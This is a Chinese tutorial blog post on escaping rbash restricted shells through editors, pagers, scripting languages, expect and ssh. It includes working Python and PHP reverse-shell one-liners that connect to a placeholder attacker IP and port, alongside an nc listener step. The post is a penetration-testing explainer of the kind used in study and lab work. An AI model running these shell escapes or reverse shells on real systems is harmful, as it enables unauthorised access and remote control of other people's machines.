RBash - 受限的Bash绕过
在 man bash
的时候,里面会有介绍到关于rbash是个什么东西
翻译解释一下就是
如果bash以rbash这个名字启动,或者是通过-r选项调用时,那么这个shell就会受限 受限shell(以下统称为rbash)和bash相同,但以下情况是不允许rbash执行的
- 使用命令cd更改目录
- 设置或者取消环境变量的设置(SHELL, PATH, ENV, or BASH_ENV)
- 指定包含参数'/'的文件名
- 指定包含参数' - '的文件名
- 使用重定向输出'>', '>>', '> |', '<>' '>&','&>'
大致的限制如上
那么我们如果在实际环境中,如果想要对环境进行进一步的操作,那么rbash肯定是不符合要求的,所以才有了“绕过”这一行为
而因为rbash的特殊性问题,绕过的方法,大多都是通过Linux机器上现有的软件,来执行一个没有限制的shell回来使用
创建限制shell的用户
在RHEL和Centos的系统中,rbash不能直接实现,所以在开始之前,我们需要通过 ln-s
来建立一个软连接
然后创建用户的时候,在设置用户是以/bin/rbash来启动的shell
试试水,发现用户 elapse
不能切换目录了,至于为什么这样能生效,在上面解释了rbash和bash是同个东西,只不过不同命名启动时,效果不一样
RBash 绕过
在 hacking articles
中,有解释过类似的行为
他将绕过rbash的操作分为了6个部分
第一个是使用Linux现有的软件,例如vi或者ed这类编辑器,来执行一个shell
第二个是使用一种语言来执行命令,返回一个无限制的shell,例如使用 python
的os库执行 /bin/bash
第三个是使用系统命令或者php之类的,反弹一个系统shell到你的攻击机上
第四个是利用系统中的二进制文件来进行绕过,这里给出的文件有 more less man
第五个是,利用expect来绕过
第六个是,通过ssh来绕过rbash的限制
编辑器绕过rbash
- vi编辑器
在命令行中,输入 vi
,在末行模式中,输入 :setshell=/bin/bash
这里就直接将shell设置为/bin/bash
接着在执行命令 shell
就好了
然后就有一个无限制的shell了
- ed编辑器
使用编程语言绕过rbash
- python
- perl
反弹shell来绕过rbash
- python反弹
首先在攻击机中 nc-lvp
开启监听端口,然后靶机中输入
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
靶机
攻击机
- php反弹
php -r '$sock=fsockopen("LISTENING IP",LISTENING PORT);exec("/bin/sh -i <&3 >&3 2>&3");'
利用二进制文件
- more
直接 ! 'sh'
- less
然后末行模式输入 !'sh'
- man
和上面一样
Expect 绕过rbash
expect是免费的编程工具,用来实现自动的交互式任务,在实际环境中脚本或者命令都需要从终端输入来继续运行,而expect就可以根据程序的提示来模拟输入个程序
ssh绕过rbash
好像不止有这种写法,但是版本问题只能用这个
还有 -t"/binbash"
参考链接
https://www.howtoing.com/rbash-a-restricted-bash-shell-explained-with-practical-examples/
https://www.hackingarticles.in/multiple-methods-to-bypass-restricted-shell/
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- 浅谈python下tiff图像的读取和保存方法
- Jmeter(二十五) - 从入门到精通 - JMeter函数 - 下篇(详解教程)
- 解决vscode python print 输出窗口中文乱码的问题
- 对python3新增的byte类型详解
- Python实现的特征提取操作示例
- Linux进程间通信方式之socket使用实例
- python实现图片识别汽车功能
- Mac下Anaconda的安装和使用教程
- linux ubuntu中安装、卸载和删除python-igraph的方法教程
- python实现汽车管理系统
- tp5框架基于ajax实现异步删除图片的方法示例
- Python3 jupyter notebook 服务器搭建过程
- PHP图像处理 imagestring添加图片水印与文字水印操作示例
- CentOS6.9下NFS服务安装配置教程
- Python 中 function(#) (X)格式 和 (#)在Python3.*中的注意事项